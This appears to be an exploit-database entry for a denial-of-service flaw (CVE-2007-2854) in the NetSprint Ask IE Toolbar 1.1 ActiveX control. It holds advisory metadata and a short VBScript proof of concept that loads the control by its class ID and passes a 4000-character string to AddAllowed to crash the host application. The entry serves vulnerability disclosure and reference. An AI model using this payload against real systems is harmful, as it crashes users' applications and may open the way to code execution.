NetSprint Ask IE Toolbar ActiveX Control Denial of Service Vulnerabilities

vendor:

Ask IE Toolbar

by:

Unknown

7.5

CVSS

HIGH

Denial of Service

399

CWE

Product Name: Ask IE Toolbar

Affected Version From: 1.1

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-2007-2854

CPE: a:netsprint:ask_ie_toolbar:1.1

Metasploit:

Other Scripts:

Platforms Tested: Windows

2007

NetSprint Ask IE Toolbar ActiveX Control Denial of Service Vulnerabilities

Remote attackers can crash applications that employ the vulnerable controls, potentially allowing code execution.

Mitigation:

There is no known mitigation for this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23535/info

NetSprint Ask IE Toolbar ActiveX control is prone to multiple denial-of-service vulnerabilities.

Exploiting these issues allows remote attackers to crash applications that employ the vulnerable controls (typically Microsoft Internet Explorer). Attackers may potentially exploit these issues to execute code, but this has not been confirmed.

NetSprint Ask IE Toolbar 1.1 is vulnerable; other versions may also be affected.

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:89D30B4C-2408-4E78-A334-8FF8A9713EA7' id='target' />
<script language='vbscript'>

arg=String(4000, "A")

target.AddAllowed arg

</script></job></package>